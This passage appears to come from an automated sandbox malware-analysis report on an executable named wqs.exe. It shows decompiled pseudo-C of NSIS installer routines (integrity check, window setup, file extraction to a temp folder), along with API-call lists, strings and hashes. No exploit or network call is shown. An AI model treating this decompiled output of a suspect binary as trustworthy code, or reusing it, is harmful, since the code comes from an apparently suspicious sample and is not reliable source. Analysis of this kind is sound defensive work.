						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(0x440800, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bf2
0x00403bfb
0x00403c02
0x00403c04
0x00403c18
0x00403c2a
0x00403c33
0x00403c3c
0x00403c43
0x00403c48
0x00403c4f
0x00403c62
0x00403c62
0x00403c6d
0x00403c06
0x00403c11
0x00403c11
0x00403c72
0x00403c85
0x00403c8a
0x00403c9b
0x00403d2d
0x00403d35
0x00403d3e
0x00403d3e
0x00403d54
0x00403d5a
0x00403d68
0x00403de9
0x00403df1
0x00403dfb
0x00403e00
0x00403e06
0x00403e90
0x00403e95
0x00403e97
0x00403eb3
0x00000000
0x00403eb3
0x00403e99
0x00403e9f
0x00403ea7
0x00403ea7
0x00000000
0x00403e9f
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e2d
0x00403e2d
0x00403e38
0x00403e40
0x00403e42
0x00403e44
0x00403e4d
0x00403e50
0x00403e56
0x00403e56
0x00403e5c
0x00403e75
0x00403e86
0x00000000
0x00403e8b
0x00403df3
0x00403df5
0x00000000
0x00403d6a
0x00403d6a
0x00403d76
0x00403d80
0x00403d86
0x00403d8b
0x00403d9a
0x00403eb8
0x00403eb8
0x00000000
0x00403eb8
0x00403da9
0x00403de4
0x00000000
0x00403de4
0x00403ca1
0x00403ca1
0x00403ca4
0x00403ca6
0x00000000
0x00000000
0x00403cb4
0x00403cc6
0x00403ccb
0x00403cd4
0x00000000
0x00000000
0x00403cda
0x00403cdc
0x00403ce9
0x00403ce9
0x00403cf2
0x00403cf8
0x00403d20
0x00403d28
0x00000000
0x00403d0a
0x00403d0b
0x00403d14
0x00403d1a
0x00403d1b
0x00000000
0x00403d1b
0x00403d16
0x00403d18
0x00000000
0x00000000
0x00000000
0x00403d18
0x00403cf8

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75B53420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
RichEdit, xrefs: 00403E47
.exe, xrefs: 00403CFA
RichEdit20W, xrefs: 00403E38, 00403E3E
RichEd20, xrefs: 00403E1A
Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
RichEd32, xrefs: 00403E28
1033, xrefs: 00403C0C, 00403C68
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
.DEFAULT\Control Panel\International, xrefs: 00403C58
_Nb, xrefs: 00403D70, 00403DD8

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3228750522
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, _t91);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x434f14 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004034CF(0x416a18, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x434f14 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41ea18; // 0x52c3a
							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x434f14 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42aa24) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031fe
0x00000000
0x00000000
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x00403251
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403127
0x00403129
0x00403129
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x00403141
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403157
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a7
0x004031af
0x004031b2
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004031a7
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\wqs.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\AppData\Roaming\wqs.exe,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
soft, xrefs: 0040316B
Inst, xrefs: 00403162
Error launching installer, xrefs: 004030CD
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
C:\Users\user\AppData\Roaming\wqs.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Null, xrefs: 00403174
}8@, xrefs: 00403227, 00403242

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\wqs.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-2868854434
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

... %d%%, xrefs: 004033FB
A, xrefs: 00403374
A, xrefs: 0040347E
ZB, xrefs: 004033A2, 004033BD, 0040343A
*B, xrefs: 004032DF
}8@, xrefs: 004032B4

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ ZB$ A$ A$... %d%%$}8@
API String ID: 551687249-3683892814
Opcode ID: 3bb00b159343602b5baf8216f2e6fd7ccfc314744640e4b330e170589aabe739
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: 3bb00b159343602b5baf8216f2e6fd7ccfc314744640e4b330e170589aabe739
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8));
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24);
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nsf8786.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsf8786.tmp$C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll$Call
API String ID: 1941528284-2801446161
Opcode ID: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
